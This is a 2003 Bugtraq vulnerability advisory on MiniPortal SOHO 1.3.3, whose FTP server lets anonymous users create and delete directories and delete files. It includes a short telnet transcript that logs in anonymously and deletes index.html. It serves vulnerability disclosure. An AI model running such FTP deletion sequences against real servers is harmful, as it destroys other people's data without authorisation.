[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030330191525.24874.qmail@www.securityfocus.com>
Date: 30 Mar 2003 19:15:25 -0000
From: subj <r2subj3ct@...lan.org>
To: bugtraq@...urityfocus.com
Subject: MiniPortal
Product : MiniPortal SOHO
Version : 1.3.3
OSystem : Windows
Authors : Instant Servers Inc
WebSite : http://www.instantservers.com
Problem : Create and Remove directories with anonymous access
Description:
------------
eng:
====
MiniPortal includes the following components:
WEB Server [Apache 1.3.27]
FTP Server
DNS Server
During research of components of the server, the following was revealed:
The anonymous user can create and delete directories on the server,
And also can delete any files on it.
Exploits:
---------
>>Telnet 127.0.0.1 21
220 FTP Server, ready
>> USER anonymous
331 Password required
>> PASS anonymous@...alhost
230 User logged in
>>MKD test
257 "test" created
>>RMD test
200 Okay
>>DELE index.html
200 Okay
Contacts:
---------
r2subj3ct@...lan.org
subj.24h.to (www.dwcgr0up.com/subj/)
www.dwcgr0up.com
irc.dwcgr0up.biz #dwc
Thanks:
-------
DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies
DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.
Powered by blists - more mailing lists